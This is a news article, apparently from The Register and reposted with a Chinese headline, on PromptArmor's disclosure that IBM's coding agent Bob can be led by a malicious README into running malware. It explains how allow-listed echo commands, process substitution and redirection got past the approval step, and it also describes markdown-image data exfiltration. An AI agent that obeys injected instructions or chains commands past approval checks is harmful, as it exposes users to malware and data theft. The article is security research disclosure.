研究人員揭露:IBM AI 代理 Bob 輕易被誘騙執行惡意軟體

研究人員揭露:IBM AI 代理 Bob 輕易被誘騙執行惡意軟體

Hacker News·

研究人員發現,IBM 的 AI 編碼代理 Bob,可透過提示注入(prompt injection)輕易繞過其安全防護措施,並執行惡意指令。

Image

Image

Image

Image

Image

Topics

Security

Off-Prem

On-Prem

Software

Offbeat

Special Features

Vendor Voice

Vendor Voice

Resources

Image

IBM's AI agent Bob easily duped to run malware, researchers show

Image

Prompt injection lets risky commands slip past guardrails

Image

Image

IBM describes its coding agent thus: "Bob is your AI software development partner that understands your intent, repo, and security standards." Unfortunately, Bob doesn't always follow those security standards.

Announced last October and presently in closed beta testing, IBM offers Bob in the form of a command line interface – a CLI, like Claude Code – and an integrated development environment – an IDE like Cursor.

Security researchers at PromptArmor have been evaluating Bob prior to general release and have found that IBM's "AI development partner" can be manipulated into executing malware. They report that the CLI is vulnerable to prompt injection attacks that allow malware execution and that the IDE is vulnerable to common AI-specific data exfiltration vectors.

AI agent software – models given access to tools and tasked with some goal in an iterative loop – is notoriously insecure and often comes with warnings from vendors. The risks have been demonstrated repeatedly by security researcher Johann Rehberger, among others. Agents may be vulnerable to prompt injection, jailbreaks, or more traditional code flaws that enable the execution of malicious code.

As Rehberger remarked at a recent presentation to the Chaos Computer Club, the fix for many of these risks involves putting a human in the loop to authorize risky action.

That's apparently the case with Bob. IBM's documentation, the PromptArmor Threat Intelligence Team explained in a writeup provided to The Register, includes a warning that setting high-risk commands to be automatically approved for agent usage potentially allows harmful operations.

Big Blue's recommendation is that users rely on allow lists and avoid wildcard characters, with the assumption that the agent will ask the user to approve or reject the automated use of fraught commands.

But according to PromptArmor, Bob's defenses are a bit too porous. Company researchers gave Bob a code repo to explore that contained a malicious README.md file. The file includes instructions that tell Bob it's responsible for conducting phishing training with the user.

Image

Screenshot of Bob CLI vulnerability, from PromptArmor - Click to enlarge

The markdown file includes a series of "echo" commands, which if entered into a terminal application will print a message to the shell's standard output. The first two are benign and when Bob follows the instructions, the model presents a prompt in the terminal window asking the user to allow the command once, to always allow it, or to suggest changes.

In its third appearance, the "echo" command attempts to fetch a malicious script. And if the user has been lulled into allowing "echo" to run always, the malware will be installed and executed without approval.

Both the CLI and IDE, even when given a green light to always run a command, are still intended to have additional security measures. Specifically, Bob disallows the use of command substitution like "$(command)" as a safeguard. But it doesn't check for process substitution, as seen in a bug the researchers found in the project's minified JavaScript code.

Image

Screenshot of vulnerable Bob JavaScript code - Click to enlarge

Also, the agent software fails to catch when separate subcommands have been chained together using the ">" redirection operator.

Thus, the researchers were able to prefix a series of malicious commands with the allowed "echo" command and run the entire set of instructions.

"For IBM Bob, we were able to bypass several defense mechanisms - ultimately, the 'human in the loop' approval function only ends up validating an allow-listed safe command, when in reality more sensitive commands were being run (that were not on the allow-list)," explained Shankar Krishnan, managing director at PromptArmor, in an email to The Register.

"If this were tried with Claude Code, a programmatic defense would stop the attack flow and request user consent for the whole multi-part malicious command – even if the first command in the sequence were on the auto-approval list."

Given the ability to induce Bob to deliver an arbitrary shell script payload to the victim's machine, the attacker could run ransomware, steal credentials, or commandeer the device.

"There are a few plausible scenarios here," said Krishnan. "This risk is relevant for any developer workflows that leverage untrusted data. For example, Bob can read webpages – a prompt injection can be encountered if the user requests that Bob review a site containing untrusted content (e.g. developer docs, StackOverflow). Bob can also read terminal command outputs – an injection in a third-party data source can be printed after a command is run and ingested by Bob. Our write-up considers a developer working with an untrusted open-source repository, as it is a self-contained and realistic example."

Additionally, the PromptArmor researchers say that the IDE is susceptible to a zero-click data exfiltration attack that affects a number of AI applications. Specifically, Bob will render markdown images in model output with a Content Security Policy that allows network request endpoints to be logged by attackers. This could allow data exfiltration via pre-fetched JSON schemas potentially.

IBM did not immediately respond to a request for comment. We're told that the company has been informed of the vulnerability. ®

Image

More about

Narrower topics

Broader topics

Image

Image

More about

Narrower topics

Broader topics

Send us news

Other stories you might like

The Register Biting the hand that feeds IT

Image

Image

Image

Image

Image

Copyright. All rights reserved © 1998–2025

Hacker News

相關文章

  1. IBM AI('Bob')透過提示注入漏洞,可下載並執行惡意軟體

    3 個月前

  2. 設計具備防禦提示注入能力的 AI 代理

    OpenAI · 大約 1 個月前

  3. Superhuman AI 透過提示注入漏洞竊取電子郵件

    3 個月前

  4. 如何確保AI程式碼代理的安全?

    4 個月前

  5. 為何 AI 持續容易遭受提示注入攻擊

    3 個月前